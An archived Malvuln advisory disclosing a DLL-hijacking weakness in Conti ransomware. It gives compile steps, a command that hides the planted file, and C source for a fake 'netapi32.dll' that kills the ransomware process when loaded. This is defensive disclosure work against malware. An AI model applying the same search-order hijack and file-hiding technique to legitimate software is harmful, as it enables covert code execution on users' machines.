https://www.malvuln.com/advisory/9eb9197cd58f4417a27621c4e1b25a71.txt Archived: 2026-04-05 19:56:10 UTC Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/9eb9197cd58f4417a27621c4e1b25a71.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Conti Ransom Vulnerability: Code Execution Description: Conti looks for and executes DLLs in its current directory. Therefore, we can potentially hijack Family: Conti Type: PE32 MD5: 9eb9197cd58f4417a27621c4e1b25a71 Vuln ID: MVID-2022-0576 Disclosure: 05/03/2022 Video PoC URL: https://www.youtube.com/watch?v=Sb2fKCOSoew Video PoC URL: https://vimeo.com/751855543 Exploit/PoC: 1) Compile the following C code as "netapi32.dll" 2) Place the DLL in same directory as the ransomware 3) Optional - Hide it: attrib +s +h "netapi32.dll" 4) Run Conti #include "windows.h" #include "stdio.h" //By malvuln //Purpose: Code Execution //Target: Conti Ransomware //MD5: 9eb9197cd58f4417a27621c4e1b25a71 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //gcc -c netapi32.c -m32 //gcc -shared -o netapi32.dll netapi32.o -m32 BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); TCHAR buf[MAX_PATH]; GetCurrentDirectory(MAX_PATH, TEXT(buf)); int rc = strcmp("C:\\Windows\\System32", TEXT(buf)); if(rc != 0){ https://www.malvuln.com/advisory/9eb9197cd58f4417a27621c4e1b25a71.txt Page 1 of 2 HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantee Source: https://www.malvuln.com/advisory/9eb9197cd58f4417a27621c4e1b25a71.txt https://www.malvuln.com/advisory/9eb9197cd58f4417a27621c4e1b25a71.txt Page 2 of 2